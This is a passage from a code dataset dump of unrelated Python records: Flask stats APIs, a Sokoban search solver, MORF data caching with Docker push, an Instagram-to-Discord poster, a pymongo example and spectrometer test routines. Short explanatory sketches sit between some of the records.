db.desc(Department.sort),\n db.desc(Department.id)\n ).all()\n data = []\n department_name_dic = {}\n department_name_list = []\n for department in department_list_jc:\n item = department.__to_dict__(['id', \"name\", 'describe', 'user_list', 'create_time', 'update_time'])\n department_name_list.append(item['name'])\n data.append(item)\n department_name_dic[\"name_list\"] = department_name_list\n data.insert(0, department_name_dic)\n print(\"department_list_data--------->\", data)\n return data\n","sub_path":"flask_ubuntu/application/apps/index/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
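`Add.user` in the record above salts an MD5 hash with the username before storing the password. Factored out for clarity (a sketch of the record's own scheme; note that MD5 is a weak choice for password storage in practice):

```python
import hashlib

def hash_password(username: str, password: str) -> str:
    h = hashlib.md5(username.encode('utf-8'))  # username acts as a per-user salt
    h.update(password.encode('utf-8'))
    return h.hexdigest()
```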
+{"seq_id":"106242700","text":"#!/bin/python3\n\nfrom treeNode import Node\nfrom state import State\nfrom mazeReader import MazeReader\nfrom heuristicsFactory import HeuristicsFactory\nfrom configFileReader import ConfigFileReader\nimport heapq\nimport sys\nfrom collections import deque\nfrom math import sqrt\nimport datetime as dt\n\ndef findNextStates(curr, goalSquares, maze, E, cornerSense = False):\n boxes = curr.state.boxes\n user = curr.state.user\n newStates = []\n for dir in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n moveCost = 0\n boxMoved = ()\n newBoxes = boxes\n hasChanged = False\n tdir = (user[0]+dir[0], user[1]+dir[1])\n t = maze[tdir[0]][tdir[1]]\n if tdir in boxes:\n ttdir = (user[0]+2*dir[0], user[1]+2*dir[1])\n tt = maze[ttdir[0]][ttdir[1]]\n moveCost+=1 \n if tt == ' ' or tt == '.' and ttdir not in boxes:\n hasChanged = True\n boxMoved = tdir\n elif t == ' ' or t == '.':\n moveCost+=2\n hasChanged = True\n if hasChanged:\n newUser = (user[0]+dir[0], user[1]+dir[1])\n if len(boxMoved) > 0:\n newBoxes = [b for b in boxes if b != tdir]\n newBoxes.append(ttdir)\n toBeAdded = State(newBoxes, newUser)\n if not toBeAdded in E:\n E.append(toBeAdded)\n if not cornerSense or not toBeAdded.hasUnmovableBox(maze, goalSquares):\n newStates.append(Node(p=curr, state=toBeAdded, g=curr.g + moveCost))\n return newStates\n\nclass Solver:\n\n def __init__(self, settings):\n self.settings = settings\n\n def solve(self, mazeFile):\n\n mr = MazeReader(mazeFile)\n\n Tr = mr.Tr\n Tr.g = 0\n\n maze = mr.Q0\n gS = mr.goalSquares\n\n BFS = self.settings['BFS']\n id = self.settings['IDDFS'] or self.settings['IDA*']\n A = self.settings['A*'] or self.settings['IDA*']\n GG = self.settings['GG']\n H = self.settings['H']\n depthStep = self.settings['IDDFS-Step']\n if not GG:\n def f(node):\n return node.g + node.h\n else:\n def f(node):\n return node.h\n\n heuristicsFactory = HeuristicsFactory(H, gS)\n h = heuristicsFactory.getHeuristic()\n\n Tr.h = h(Tr.state)\n Tr.f = f\n\n start = dt.datetime.now()\n\n if BFS:\n F = deque()\n else:\n F = []\n E = []\n F.append(Tr)\n E.append(Tr.state)\n if not id:\n solved = False\n Tr.f = f\n while len(F) > 0 and not solved:\n # # Uniform Cost Search\n if A or GG:\n curr = heapq.heappop(F)\n # BFS\n elif BFS:\n curr = F.popleft()\n # DFS\n else:\n curr = F.pop()\n if self.settings['PrintState'] == 1:\n curr.state.printState(maze)\n if curr.state.checkFinal(gS):\n solutionNode = curr\n solved = True\n totalTime = dt.datetime.now() - start\n else:\n newNodes = findNextStates(curr, gS, maze, E, self.settings['CornerSense'])\n for node in newNodes:\n node.f = f\n node.h = h(node.state)\n curr.children.append(node)\n # Uniform Cost Search\n if A or GG:\n heapq.heappush(F, node)\n # BFS, DFS\n else:\n F.append(node)\n\n elif not A: # iddfs\n\n limit = 1\n solved = False\n while limit < 1000 and not solved:\n F = []\n F.append([Tr, limit])\n while len(F)>0 and not solved:\n [curr, lim] = F.pop()\n if self.settings['PrintState'] == 1:\n curr.state.printState(maze)\n if lim <= 0:\n False\n elif curr.state.checkFinal(gS):\n solutionNode = curr\n solved = True\n totalTime = dt.datetime.now() - start\n else:\n if len(curr.children) > 0:\n newNodes = curr.children\n else:\n newNodes = findNextStates(curr, gS, maze, E, self.settings['CornerSense'])\n curr.children.extend(newNodes)\n F.extend([[node, lim-1] for node in newNodes])\n limit += depthStep\n\n else: # ida*\n solved = False\n limit = Tr.f(Tr)\n while limit < 1000 and not solved:\n F = []\n candidates = []\n heapq.heappush(F, 
Tr)\n while len(F)>0 and not solved:\n curr = heapq.heappop(F)\n if self.settings['PrintState'] == 1:\n curr.state.printState(maze)\n if curr.f(curr) > limit:\n candidates.append(curr.f(curr))\n elif curr.state.checkFinal(gS):\n solutionNode = curr\n solved = True\n totalTime = dt.datetime.now() - start\n else:\n if len(curr.children) > 0:\n newNodes = curr.children\n else:\n newNodes = findNextStates(curr, gS, maze, E, self.settings['CornerSense'])\n for node in newNodes:\n node.h = h(node.state)\n node.f = f\n curr.children.extend(newNodes)\n F.extend(newNodes)\n limit = min(candidates)\n if solved:\n p = solutionNode\n path = deque()\n while p is not None:\n path.appendleft(p.state)\n p = p.p\n for state in path:\n state.printState(maze)\n print(\"&&\")\n\n print(\"SUCCESFULLY SOLVED\\nTotal cost: %ld\\nSolution Depth: %ld\\nExpanded Nodes: %ld\\nRemaining Frontier: %ld\" \n % (solutionNode.g, len(path), len(E), len(F)))\n print(totalTime.total_seconds())\n else:\n print(\"NO SOLUTION\\nExpanded Nodes: %ld\\nRemaining Frontier: %ld\" \n % (len(E), len(F)))\n","sub_path":"TP1/python/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":6839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
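The solver record above switches its frontier between a deque (BFS), a list used as a stack (DFS), and a heapq priority queue (A*/greedy). A toy sketch of that priority-queue branch in isolation (best_first is a hypothetical helper; the lambdas are stand-ins, not the Sokoban state model):

import heapq

def best_first(start, neighbors, is_goal, f):
    # Pop the lowest-f node, stop at a goal, push unseen children:
    # the same frontier discipline as the A*/greedy branch above.
    frontier = [(f(start), start)]
    explored = {start}
    while frontier:
        _, node = heapq.heappop(frontier)
        if is_goal(node):
            return node
        for nxt in neighbors(node):
            if nxt not in explored:
                explored.add(nxt)
                heapq.heappush(frontier, (f(nxt), nxt))
    return None

# Toy usage on the integer line: f(n) is the distance to the goal value 7.
print(best_first(0, lambda n: [n - 1, n + 1], lambda n: n == 7, lambda n: abs(7 - n)))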
+{"seq_id":"472716988","text":"\nimport string\nimport random \n\n\ndef new_string(length):\n letters = string.ascii_lowercase+string.digits\n str = ''.join(random.choice(letters) for num in range(length))\n return str\n \n#print(get_random_string(10))\n\ndef string_gen ():\n strings = []\n number_of_strings = input(\"How many strings do you want to generate? \")\n minimum_length = input(\"What is the minimum length that you want? \")\n maximum_length = input(\"What is the max length that you want? \")\n \n while not number_of_strings.isnumeric(): \n print(\"We only accept numeric values.\")\n number_of_strings = input(\"How many strings do you want to generate?\")\n while not minimum_length.isnumeric(): \n print(\"We only accept numeric values. \")\n minimum_length = input(\"What the minimum length that you want? \")\n while not maximum_length.isnumeric(): \n print(\"We only accept numeric values. \")\n maximum_length = input(\"What is the max length that you want? \") \n \n number_of_strings = int(number_of_strings)\n minimum_length = int(minimum_length)\n maximum_length = int(maximum_length)\n \n while True: \n if maximum_length < minimum_length: \n print(\"Program reboots because your max is smaller than your minimum\")\n string_gen()\n break\n else: \n break\n \n final_length = [minimum_length, maximum_length]\n final_length = random.choice(final_length)\n \n while number_of_strings > 0:\n string = new_string(final_length)\n strings.append(string)\n number_of_strings = number_of_strings - 1\n \n return strings\n \nprint(string_gen())\n\n\n\n","sub_path":"module-1/Code-Simplicity-Efficiency/your-code/challenge-2_test.py","file_name":"challenge-2_test.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"48879024","text":"# Copyright (c) 2018 The Regents of the University of Michigan\n# and the University of Pennsylvania\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\nFunctions for caching data for MORF jobs.\n\"\"\"\n\nimport os\nimport subprocess\nimport shutil\nfrom urllib.parse import urlparse\nimport logging\nfrom morf.utils.docker import load_docker_image\nfrom morf.utils.log import set_logger_handlers, execute_and_log_output\nfrom morf.utils.s3interface import sync_s3_bucket_cache\n\nmodule_logger = logging.getLogger(__name__)\n\n\ndef make_course_session_cache_dir_fp(job_config, bucket, data_dir, course, session):\n fp = os.path.join(job_config.cache_dir, bucket, data_dir, course, session)\n return fp\n\n\ndef update_raw_data_cache(job_config):\n \"\"\"\n Update the raw data cache using the parameters in job_config; if job_config contains multiple raw data buckets, cache all of them.\n :param job_config: MorfJobConfig object.\n :return:\n \"\"\"\n # cache each bucket in a named directory within job_cache_dir\n for raw_data_bucket in job_config.raw_data_buckets:\n sync_s3_bucket_cache(job_config, raw_data_bucket)\n return\n\n\ndef update_proc_data_cache(job_config):\n \"\"\"\n Update the processed data cache using the parameters in job_config. Assumes job_config contains only a single proc_data_bucket.\n :param job_config: MorfJobConfig object.\n :return:\n \"\"\"\n proc_data_bucket = getattr(job_config, \"proc_data_bucket\", None)\n sync_s3_bucket_cache(job_config, proc_data_bucket)\n return\n\n\ndef fetch_from_cache(job_config, cache_file_path, dest_dir):\n \"\"\"\n Fetch a file from the cache for job_config into dest_dir, if it exists.\n :param job_config:\n :param cache_file_path: string, relative path to file in cache (this is identical to the directory path in s3; e.g. 
\"/bucket/path/to/somefile.csv\"\n :param dest_dir: absolute path of directory to fetch file into (will be created if not exists)\n :return: path to fetched file (string); return None if cache is not used.\n \"\"\"\n logger = set_logger_handlers(module_logger, job_config)\n logger.info(\"fetching file {} from cache\".format(cache_file_path))\n abs_cache_file_path = os.path.join(getattr(job_config, \"cache_dir\", None), cache_file_path)\n if hasattr(job_config, \"cache_dir\") and os.path.exists(abs_cache_file_path):\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n dest_fp = shutil.copy(abs_cache_file_path, dest_dir)\n else:\n logger.warning(\"file {} does not exist in cache\".format(abs_cache_file_path))\n dest_fp = None\n return dest_fp\n\n\ndef docker_cloud_login(job_config):\n \"\"\"\n Log into docker cloud using creds in job_config.\n :param job_config: MorfJobConfig object.\n :return: None\n \"\"\"\n cmd = \"docker login --username={} --password={}\".format(job_config.docker_cloud_username, job_config.docker_cloud_password)\n logger = set_logger_handlers(module_logger, job_config)\n execute_and_log_output(cmd, logger)\n return\n\n\ndef docker_cloud_push(job_config, image_uuid):\n \"\"\"\n Push image to Docker Cloud repo in job_config; tagging the image with its morf_id.\n :param job_config: MorfJobConfig object\n :param image_uuid: Docker image uuid\n :return: None\n \"\"\"\n logger = set_logger_handlers(module_logger, job_config)\n docker_cloud_repo_and_tag_path = \"{}:{}\".format(job_config.docker_cloud_repo, job_config.morf_id)\n # tag the docker image using the morf_id\n tag_cmd = \"docker tag {} {}\".format(image_uuid, docker_cloud_repo_and_tag_path)\n execute_and_log_output(tag_cmd, logger)\n # push the image to docker cloud\n push_cmd = \"docker push {}\".format(docker_cloud_repo_and_tag_path)\n execute_and_log_output(push_cmd, logger)\n return docker_cloud_repo_and_tag_path\n\n\ndef cache_to_docker_hub(job_config, dir, image_name):\n \"\"\"\n Push image to MORF repo in Docker Hub.\n :param job_config: MorfJobConfig object.\n :return: None\n \"\"\"\n logger = set_logger_handlers(module_logger, job_config)\n image_uuid = load_docker_image(dir, job_config, logger, image_name)\n docker_cloud_login(job_config)\n docker_cloud_repo_and_tag_path = docker_cloud_push(job_config, image_uuid)\n return docker_cloud_repo_and_tag_path\n","sub_path":"morf-python-api/morf/utils/caching.py","file_name":"caching.py","file_ext":"py","file_size_in_byte":5272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
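fetch_from_cache in the record above reduces to copy-if-present against a local mirror of the S3 layout. A dependency-free sketch of that core path (fetch_if_cached is a hypothetical stand-in without the MORF logging plumbing; the paths are illustrative):

import os
import shutil

def fetch_if_cached(cache_dir, rel_path, dest_dir):
    # Cache hit: copy the mirrored file into dest_dir and return its path.
    # Cache miss: return None, matching fetch_from_cache's behaviour.
    src = os.path.join(cache_dir, rel_path)
    if not os.path.exists(src):
        return None
    os.makedirs(dest_dir, exist_ok=True)
    return shutil.copy(src, dest_dir)

print(fetch_if_cached('/tmp/morf-cache', 'bucket/somefile.csv', '/tmp/dest'))  # None on a miss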
+{"seq_id":"467900664","text":"import json\nimport requests\nimport os\nimport time\nimport datetime\n\n# Get users from users.txt :\nmy_file = open(\"users.txt\", \"r\")\nusers = my_file.read()\nmy_file.close()\nusers = users[1:]\nusers = users [:-1]\nusers = users.split(\",\")\ni = 0\nfor user in users:\n user = user.replace('\"', \"\")\n user = user.replace(\" \", \"\")\n users[i] = user\n i = i + 1\n\nfirstCheck = True\nWEBHOOK_URL = \"\" # Put your webhook URL here\nTIME_INTERVAL = \"300\"\nLAST_IMAGE_ID = {}\n\ndef get_profile_picture(html):\n return html.json()[\"graphql\"][\"user\"][\"profile_pic_url_hd\"]\n\ndef get_last_publication_url(html):\n return html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"][0][\"node\"][\"shortcode\"]\n\ndef isVideo(html, selector):\n mediaType = html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"][selector][\"node\"][\"is_video\"]\n if(mediaType == True):\n mediaType = \"video\"\n else:\n mediaType = \"pic\"\n return(mediaType)\n\ndef get_embed(html, selector):\n embed = {}\n embed[\"color\"] = 15077485\n embed[\"title\"] = \"@\" + INSTAGRAM_USERNAME + \" posted a new \" + isVideo(html, selector)\n embed[\"url\"] = \"https://www.instagram.com/p/\" + html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"][selector][\"node\"][\"shortcode\"] +\"/\"\n try:\n embed[\"description\"] = html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"][selector][\"node\"][\"edge_media_to_caption\"][\"edges\"][0][\"node\"][\"text\"]\n except:\n embed[\"description\"] = \"\"\n embed[\"image\"] = {\"url\": html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"][selector][\"node\"][\"thumbnail_src\"]}\n embed[\"author\"] = {\"name\":f\"@{INSTAGRAM_USERNAME} (from Instagram)\", \"url\":f\"https://instagram.com/{INSTAGRAM_USERNAME}/\", \"icon_url\":get_profile_picture(html)}\n dt_object = datetime.datetime.fromtimestamp(html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"][selector][\"node\"][\"taken_at_timestamp\"])\n time = dt_object.strftime(\"%m/%d at %I:%M %p\")\n embed[\"footer\"] = {\"text\": \"• \" + time + \" (UTC Time)\", \"icon_url\": \"https://i.imgur.com/TqD7E3m.png\"}\n return embed\n\ndef webhook(webhook_url, html, selector):\n data = {}\n data[\"embeds\"] = []\n data[\"embeds\"].append(get_embed(html, selector))\n result = requests.post(webhook_url, data=json.dumps(\n data), headers={\"Content-Type\": \"application/json\"})\n try:\n result.raise_for_status()\n except requests.exceptions.HTTPError as err:\n print(err)\n else:\n print(\"Image successfully posted in Discord, code {}.\".format(\n result.status_code))\n\n\ndef get_instagram_html(INSTAGRAM_USERNAME):\n headers = {\n \"Host\": \"www.instagram.com\",\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11\"\n }\n html = requests.get(\"https://www.instagram.com/\" +\n INSTAGRAM_USERNAME + \"/channel/?__a=1\", headers=headers)\n try:\n test_json = html.json()[\"graphql\"]\n except:\n html = requests.get(\"https://www.instagram.com/\" +\n INSTAGRAM_USERNAME + \"/feed/?__a=1\", headers=headers)\n try:\n test_json = html.json()[\"graphql\"]\n except:\n print(\"JSON Error\")\n return html\n\n\ndef main():\n try:\n html = get_instagram_html(INSTAGRAM_USERNAME)\n if(firstCheck == True):\n print(\"First check, skipping the post\")\n LAST_IMAGE_ID[INSTAGRAM_USERNAME] = 
get_last_publication_url(html)\n elif(LAST_IMAGE_ID[INSTAGRAM_USERNAME] == get_last_publication_url(html)):\n print(\"No new image to post in Discord.\")\n else:\n print(\"New image to post in Discord.\")\n i = 0\n delete = True\n for id_post in html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"]:\n id_post = id_post[\"node\"][\"shortcode\"]\n if(delete == True):\n if(id_post == LAST_IMAGE_ID[INSTAGRAM_USERNAME]):\n delete = False\n else:\n delete = True\n else:\n pass\n for post in html.json()[\"graphql\"][\"user\"][\"edge_owner_to_timeline_media\"][\"edges\"]:\n post = post[\"node\"][\"shortcode\"]\n if(post == LAST_IMAGE_ID[INSTAGRAM_USERNAME] or delete == True):\n LAST_IMAGE_ID[INSTAGRAM_USERNAME] = get_last_publication_url(html)\n return\n else:\n webhook(WEBHOOK_URL, get_instagram_html(INSTAGRAM_USERNAME), i)\n i = i + 1\n\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n if WEBHOOK_URL: # an empty or missing URL means the script is not configured yet\n while True:\n for user in users:\n INSTAGRAM_USERNAME = user\n main()\n if(firstCheck == True):\n firstCheck = False\n time.sleep(float(TIME_INTERVAL or 300))\n else:\n print('Please configure the required variables properly!')","sub_path":"instagram-discord.py","file_name":"instagram-discord.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
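The webhook() function in the record above boils down to a single POST carrying an embeds array. A minimal sketch of that payload shape (post_embed is a hypothetical helper; supply your own webhook URL):

import json
import requests

def post_embed(webhook_url, title, description, image_url):
    # One embed per request, mirroring the payload built in webhook().
    payload = {'embeds': [{'title': title,
                           'description': description,
                           'image': {'url': image_url}}]}
    resp = requests.post(webhook_url, data=json.dumps(payload),
                         headers={'Content-Type': 'application/json'})
    resp.raise_for_status()
    return resp.status_code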
+{"seq_id":"571314094","text":"from pymongo import MongoClient\nimport datetime\nclient = MongoClient('localhost', 27017)#比较常用\ndb = client.test_database\ncollection = db.test_collection\n\npost = {\n \"author\": \"Mike\",\n \"text\":\"My first blog post!\",\n \"tags\":[\"mongodb\", \"python\", \"pymongo\"],\n \"date\":datetime.datetime.utcnow()\n}\n\nposts = db.posts\nposts.insert(post)\nnew_posts = [\n {\n \"author\": \"Mike\",\n \"text\": \"Another post!\",\n \"tags\": [\"bulk\", \"insert\"],\n \"date\": datetime.datetime(2009, 11, 12, 11, 14)\n },\n\n {\n \"author\": \"Eliot\",\n \"title\": \"MongoDB is fun\",\n \"text\": \"and pretty easy too!\",\n \"date\": datetime.datetime(2009, 11, 10, 10, 45)\n }\n]\nposts.insert(new_posts)\nprint(db.collection_names())\nprint(posts.find_one())\n\nfor post in posts.find():\n print(post)","sub_path":"PythonMongDb.py","file_name":"PythonMongDb.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"52280646","text":"import json\n\nfrom flask import Blueprint, g, abort, current_app, render_template, request, current_app\nfrom sqlalchemy import desc, func, and_, case\n\nfrom ..models import Player, PlayerMatchStats, SeasonStats, Season\nfrom ..core import db\nfrom . import login_required, admin_required\n\n\nplayers_bp = Blueprint('players', __name__)\n\n\ndef get_season_stats(cs_id, player):\n stats = player.season_stats[0]\n if player.season_stats[0].season_id != cs_id:\n return {'wins':0, 'losses':0, 'pts':1000}\n else:\n return stats\n\n@players_bp.route('//', methods=['GET'])\n@players_bp.route('//overview', methods=['GET'])\ndef overview(steam_id):\n p = Player.query.get(steam_id)\n if not p:\n return abort(404)\n cs_id = Season.current().id\n stats = PlayerMatchStats.query.join(SeasonStats).filter(SeasonStats.steam_id==steam_id)\\\n .order_by(desc(PlayerMatchStats.match_id)).limit(8)\n pts_seq = PlayerMatchStats.query.join(SeasonStats).filter(and_(SeasonStats.season_id==cs_id,\n SeasonStats.steam_id==steam_id)).order_by(PlayerMatchStats.match_id)\\\n .values(PlayerMatchStats.old_pts+PlayerMatchStats.pts_diff)\n pts_hist = [[0, 1000]]\n for index, el in enumerate(pts_seq):\n pts_hist.append([index+1, el[0]])\n rating_info = p.get_avg_rating()[0]\n avg_rating = rating_info[0] or 0\n rating_amount = rating_info[1]\n signature_heroes = p.get_heroes(cs_id).order_by(desc('played')).limit(3).all()\n matches_stats = stats.all()\n season_stats = get_season_stats(cs_id, p)\n return render_template('player_overview.html', player=p, season_stats=season_stats, avg_rating=avg_rating,\n rating_amount=rating_amount, signature_heroes=signature_heroes, matches_stats=matches_stats,\n pts_history=json.dumps(pts_hist))\n\n\n@players_bp.route('//matches', methods=['GET'])\ndef matches(steam_id):\n p = Player.query.get(steam_id)\n if not p:\n return abort(404)\n _args = {'player': p}\n page = request.args.get('page', '1')\n if not page.isdigit():\n abort(400)\n page = int(page)\n hero_filter = request.args.get('hero', None)\n cs_id = Season.current().id\n matches_stats = PlayerMatchStats.query.order_by(desc(PlayerMatchStats.match_id))\\\n .join(SeasonStats).filter(SeasonStats.steam_id==steam_id)\n if hero_filter:\n _args['hero_filter'] = hero_filter\n matches_stats = matches_stats.filter(PlayerMatchStats.hero==hero_filter)\n _args['matches_stats'] = matches_stats.paginate(page, \n current_app.config['PLAYER_HISTORY_MATCHES_PER_PAGE'], True)\n rating_info = p.get_avg_rating()[0]\n _args['avg_rating'] = rating_info[0] or 0\n _args['rating_amount'] = rating_info[1]\n _args['season_stats'] = get_season_stats(cs_id, p)\n return render_template('player_matches.html', **_args)\n\n\n@players_bp.route('//heroes', methods=['GET'])\ndef heroes(steam_id):\n p = Player.query.get(steam_id)\n if not p:\n return abort(404)\n _sort = request.args.get('sort', 'played')\n if _sort not in ['hero', 'played', 'pts_diff', 'winrate', 'kda']:\n _sort = 'played'\n order_by = _sort\n _desc = request.args.get('desc', 'yes')\n if _desc != 'no':\n _desc = 'yes'\n order_by = desc(order_by)\n _args = {'player': p, 'sort':_sort, 'desc':_desc}\n hero_filter = request.args.get('hero', None)\n cs_id = Season.current().id\n heroes_stats = p.get_heroes(cs_id).order_by(order_by).all()\n _args['heroes_stats'] = heroes_stats\n rating_info = p.get_avg_rating()[0]\n _args['avg_rating'] = rating_info[0] or 0\n _args['rating_amount'] = rating_info[1]\n _args['season_stats'] = get_season_stats(cs_id, p)\n return 
render_template('player_heroes.html', **_args)\n","sub_path":"gleague/frontend/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
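The pts_hist series built in overview() above is an indexed walk over per-match ratings, seeded with the 1000-point season start. A pure-Python sketch of that loop (build_pts_history is a hypothetical extraction; the input tuples mimic the SQLAlchemy .values() rows):

def build_pts_history(pts_seq, start=1000):
    # Index 0 is the season-start rating; each later entry is the
    # rating after one more match, as in overview().
    history = [[0, start]]
    for index, (pts,) in enumerate(pts_seq):
        history.append([index + 1, pts])
    return history

print(build_pts_history([(1012,), (998,), (1025,)]))
# [[0, 1000], [1, 1012], [2, 998], [3, 1025]]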
+{"seq_id":"423924425","text":"\"\"\"Routines for running Edward's spectrometer using the Leiker/Force\nI/O card for Raspberry Pis\"\"\"\n#from threading import Thread, Lock\n#lck = Lock()\nfrom scipy.optimize import curve_fit\nfrom datetime import datetime\nimport time\nfrom spectrometer import *\nimport os\n\nclass SignalGenerator:\n \"\"\"Routines for use with the Hittite syntesizer\n frequencies in MHz and power in dBm\"\"\"\n def __init__(self, ipAddress=\"192.168.0.30\"):\n self.lanio = \"lanio \" + ipAddress + \" \"\n self.freq = 0.0\n\n def setFreq(self, freq):\n \"\"\"Set the signal generator frequency in MHz\"\"\"\n os.system(self.lanio + \"\\\":FREQ \" + str(freq) + \" MHz\\\"\")\n self.freq = freq\n\n def getFreq(self):\n \"\"\"Get the signal generator frequency in MHz\"\"\"\n return float(os.popen(self.lanio + \"\\\"FREQ?\\\"\").read()) / 1000000\n\n def setPower(self, pwr):\n \"\"\"Set the signal generator power in dBm. \n With the Httite, stay above -42 dBm\"\"\"\n\n os.system(self.lanio + \"\\\":POW \" + str(pwr) + \" dBm\\\"\")\n os.system(self.lanio + \"\\\":OUTP 1\\\"\")\n\n def powerOff(self):\n os.system(self.lanio + \"\\\":OUTP 0\\\"\")\n\n def getPower(self):\n return os.system(self.lanio + \"\\\"POW?\\\"\")\n\nclass TestSpectrometer:\n def __init__(self,spec, sg):\n self.spec = spec\n self.sg = sg\n self.zeroFit = np.array([0.0,0.0])\n self.Tsys = np.empty(6)\n\n def getFileName(self):\n antennaNumber = os.uname()[1][-1:]\n timestamp = datetime.now().strftime(\"%F_%H-%M-%S\")\n return \"SS%c_%d_Data_%s\" % (antennaNumber, self.spec.number, timestamp)\n\n def gaussian(self, x, amp, cen, wid):\n return amp * np.exp(-(((x-cen)/wid)**2) /2)\n \n def measureFilter(self, freq=10, power = -25, plot=True):\n \"\"\"Measure the yig fiklter response by doing 5 scans offset by 5MHz\n to get a more accurate measurement\"\"\"\n numPoints=7\n numFreqs=5\n vals = np.zeros(numPoints*numFreqs, dtype=np.int16)\n freqs = np.zeros(numPoints*numFreqs, dtype=float)\n savefStart = self.spec.fStart\n self.sg.setFreq(freq*1000)\n self.sg.powerOff()\n self.spec.sweep()\n zeros=np.copy(self.spec.vals)\n self.sg.setPower(power)\n for n in range(numFreqs):\n self.spec.fStart = savefStart + n* self.spec.df/numFreqs\n self.spec.sweep()\n if n == 0:\n ch0 = np.argmax(self.spec.vals) - int(numPoints/2)\n zero = np.average(zeros[ch0:ch0+numPoints])\n vals[n: numPoints*numFreqs:numFreqs] = self.spec.vals[ch0:ch0+numPoints] - zero\n freqs[n: numPoints*numFreqs:numFreqs] = self.spec.freqs[ch0:ch0+numPoints]\n self.spec.fStart=savefStart\n ch0 = np.argmax(vals)\n init_vals = [vals[ch0], freqs[ch0], .012]\n [amp, ctr, wid], covar = curve_fit(self.gaussian, freqs, vals, p0=init_vals)\n if plot:\n print(\"amp %d ctr %.4f, wid %.4f\" % (amp, ctr, wid))\n plt.plot(freqs, vals, label = \"measured data\")\n plt.plot(freqs, self.gaussian(freqs, amp, ctr, wid), label = \"Gaussian fit\")\n plt.legend()\n plt.show(block=False)\n else:\n return((freq, amp, ctr, wid))\n # np.savetxt('filter.txt', np.c_[freqs, vals], fmt = \"%.3f %d\")\n # print np.c_[freqs, vals,]\n \n def measureFrequencyScale(self, fStart=4.5, fStop=16.1, df=1):\n \"\"\" Measure the yig filter's response to a series of frequencies.\n Print frequency, amplitude, measured center freq and sigma of a gaussian\n fit. 
save in the file \"yigMeasurements\" in the current directory.\n Solve for a linear fit to the measured frequencies and suggest changes\n to the file yigConstants for the current spectrometer.\"\"\"\n\n d = []\n for f in np.arange(fStart, fStop, df):\n v = self.measureFilter(f, plot=False)\n d.append(v)\n print(\"%.2f %d %.4f %.5f\" % (v[0],v[1], v[2], v[3]))\n dt = np.array(d).transpose()\n coef = np.polyfit(dt[0], dt[2], 1)\n print(coef)\n print(\"change yig.freqOffset from %.4f to %.4f\" % (self.spec.yig.freqOffset, self.spec.yig.freqOffset-coef[1]))\n print(\"change yig.scaleFactor from %.5f to %.5f\" % (self.spec.yig.scaleFactor, self.spec.yig.scaleFactor/coef[0]))\n np.savetxt(\"yigMeasurements\", d, \"%.2f %d %.4f %.5f\")\n\n def showPeak(self):\n ch = np.argmax(self.spec.vals)\n print(\"The peak is %d at %.3f GHz\" % (self.spec.vals[ch], self.spec.freqs[ch]))\n \n# def runTwo():\n# print time.time()\n# p0 = mp.Process(target=self.spec0.main)\n# p1 = mp.Process(target=self.spec1.main)\n# p0.start()\n# p1.start()\n# print time.time()\n\n# The ambient load in detector is on the low order bit (1) of byte 1 of\n# the dio and out is on the next bit (2).\n def runSpectrometer(self, verbose=True):\n noCal = True\n fp = 0\n while True:\n if noCal:\n# Wait for the ambient load to be in position\n print(\"Waiting for ambient load in\")\n while self.spec.dio.read(1) != 1:\n time.sleep(0.5)\n#Set up to make an ambient load measurement\n print(\"Starting to take ambient load data\")\n ambientCount = 0\n while self.spec.sweep(checkAmbientLoad=True):\n if ambientCount == 0:\n hotVals = self.spec.vals.copy()\n else:\n hotVals = hotVals + self.spec.vals\n ambientCount += 1\n if verbose:\n print(\"Count = %d\" % (ambientCount))\n if ambientCount >= 1:\n self.hotVals = hotVals/ambientCount-self.spec.zeros\n if fp != 0:\n fp.close()\n fileName = self.getFileName()\n fp = open(fileName, \"w\")\n fp.write(\"# Start %.3f Stop 